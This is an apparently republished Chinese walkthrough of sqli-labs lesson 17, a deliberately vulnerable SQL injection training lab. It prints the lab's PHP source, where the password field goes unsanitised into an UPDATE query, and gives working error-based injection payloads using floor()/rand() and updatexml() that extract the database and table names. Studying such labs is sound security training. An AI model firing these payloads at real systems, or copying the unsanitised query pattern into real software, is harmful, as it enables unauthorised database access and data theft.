sqli-labs less-17

Posted 可乐

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了sqli-labs less-17相关的知识,希望对你有一定的参考价值。

less-17

uname=admin\' #&passwd=a
"
")
\')
都是秘密错误


试一下永真

uname=a&passwd=a\' or 1=1 #

uname=a&passwd=a" or 1=1 #

uname=a&passwd=a\') or 1=1 #

uname=a&passwd=a") or 1=1 #

也全部报错

看一下源码

<?php
//including the mysql connect parameters.
include("../sql-connections/sql-connect.php");
error_reporting(0);

function check_input($value)
    {
    if(!empty($value))
        {
        // truncation (see comments)
        $value = substr($value,0,15);
        }

        // Stripslashes if magic quotes enabled
        if (get_magic_quotes_gpc())
            {
            $value = stripslashes($value);
            }

        // Quote if not a number
        if (!ctype_digit($value))
            {
            $value = "\'" . mysql_real_escape_string($value) . "\'";
            }
        
    else
        {
        $value = intval($value);
        }
    return $value;
    }

// take the variables
if(isset($_POST[\'uname\']) && isset($_POST[\'passwd\']))

{
//making sure uname is not injectable
$uname=check_input($_POST[\'uname\']);  

$passwd=$_POST[\'passwd\'];


//logging the connection parameters to a file for analysis.
$fp=fopen(\'result.txt\',\'a\');
fwrite($fp,\'User Name:\'.$uname."\\n");
fwrite($fp,\'New Password:\'.$passwd."\\n");
fclose($fp);


// connectivity 
@$sql="SELECT username, password FROM users WHERE username= $uname LIMIT 0,1";

$result=mysql_query($sql);
$row = mysql_fetch_array($result);
//echo $row;
    if($row)
    {
          //echo \'<font color= "#0000ff">\';    
        $row1 = $row[\'username\'];      
        //echo \'Your Login name:\'. $row1;
        $update="UPDATE users SET password = \'$passwd\' WHERE username=\'$row1\'";
        mysql_query($update);
          echo "<br>";
    
    
    
        if (mysql_error())
        {
            echo \'<font color= "#FFFF00" font size = 3 >\';
            print_r(mysql_error());
            echo "</br></br>";
            echo "</font>";
        }
        else
        {
            echo \'<font color= "#FFFF00" font size = 3 >\';
            //echo " You password has been successfully updated " ;        
            echo "<br>";
            echo "</font>";
        }
    
        echo \'<img src="../images/flag1.jpg"   />\';    
        //echo \'Your Password:\' .$row[\'password\'];
          echo "</font>";
    


      }
    else  
    {
        echo \'<font size="4.5" color="#FFFF00">\';
        //echo "Bug off you Silly Dumb hacker";
        echo "</br>";
        echo \'<img src="../images/slap1.jpg"   />\';
    
        echo "</font>";  
    }
}

使用了get_magic_quotes_gpc

name和password分开验证

做过头了 ,这个是秘密重置

我们先看一些check_input()这个函数的内容

对传入的uname进行了限制 ,只能16个字符

调用了get_magic_quotes_gpc() 将  \'   "  空格 /  进行了转义

这里没有对passwd进行任何处理

 

这里可以用floor()报错注入

uname=admin&passwd=1\' and (select 1 from (select count(*),concat(database(),floor(rand(0)*2))x from information_schema.tables group by x)a) #

 

还可以用updatexml()进行报错

1\' and updatexml(1,concat(0x7e,(select database()),0x7e),1) #

爆表

uname=admin&passwd=1\' and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=\'security\'),0x7e),1) #

 

以上是关于sqli-labs less-17的主要内容,如果未能解决你的问题,请参考以下文章

sqli-labs less17 update query-error based

less 17

sqli-labs

sqli-labs学习

sqli-labs lesson 23

sqli-labs 页面显示sql语句